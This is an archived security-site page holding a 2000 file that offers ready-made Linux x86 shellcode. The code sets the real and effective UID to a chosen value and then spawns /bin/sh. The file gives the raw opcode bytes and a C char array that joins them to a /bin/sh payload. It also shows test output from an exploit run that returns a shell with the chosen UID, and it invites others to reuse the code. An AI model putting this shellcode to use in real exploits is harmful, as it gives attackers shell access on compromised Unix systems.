exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

setreuid_1-255.asm

setreuid_1-255.asm
Posted Dec 15, 2000
Authored by vade79, realhalo | Site realhalo.org

Shellcode which does a setreuid before spawning a shell. Allows you to choose which UID / GID to use.

tags | shell, shellcode
systems | unix
SHA-256 | bab59cebad1397fb98c625b155e3892b60680d09a40410d2dae76cd0f4e43062

setreuid_1-255.asm

Change Mirror Download
(linux)asm[setreuid(?,?)]:  pre-made shellcode. by:  vade79/v9[v9@fakehalo.org]
.
-------------------------------------------------------------------------------
-

*** CODE:

since i did not see(i was looking) shellcode/asm for setreuid(nonroot,nonroot),
i made myself some shellcode for such a need(good old gdb). it will work for
uid values between 1-255(hex=0x01-0xff). so, here it is already put into hex:

0x29, 0xC0, 0xB0, 0x46, 0x29, 0xDB, 0xB3, 0x??, 0x89, 0xD9, 0xCD, 0x80.

replace 0x?? with the hex of your gid value, like 0x20 = uid32. (hex->ascii)

so, in typical format: "\x29\xc0\xb0\x46\x29\xdb\xb3\x20\x89\xd9\xcd\x80" would
give you uid/euid = 32.

and just append this to your typical shellcode to execute /bin/sh:

*** EXAMPLE CODE:

char setreuid_exec[]=
// setreuid(32, 32); (0x20=32)
"\x29\xc0\xb0\x46\x29\xdb\xb3\x20\x89\xd9\xcd\x80"
// execl("/bin/sh"); (with 0x01 of course :P)
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56"
"\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80"
"\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01";

*** TEST:

# ./test_exp
return address: 0xbffff544, offset: 500.
shell-init: could not get current directory: getwd: cannot access parent direct
ories
bash$ id
job-working-directory: could not get current directory: getwd: cannot access pa
rent directories
fakehalo: uid:32 gid:0. [euid:32 egid:0]
bash$

*** NOTE:

i don't think i'm the only one who will ever need this, so here it is for
others - save yourself some time. the ironic thing is, i forgot what i
originally wanted this shellcode for after i made it.

-- vade79 / v9@fakehalo.org / www.fakehalo.org->www.realhalo.org. --

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    65 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close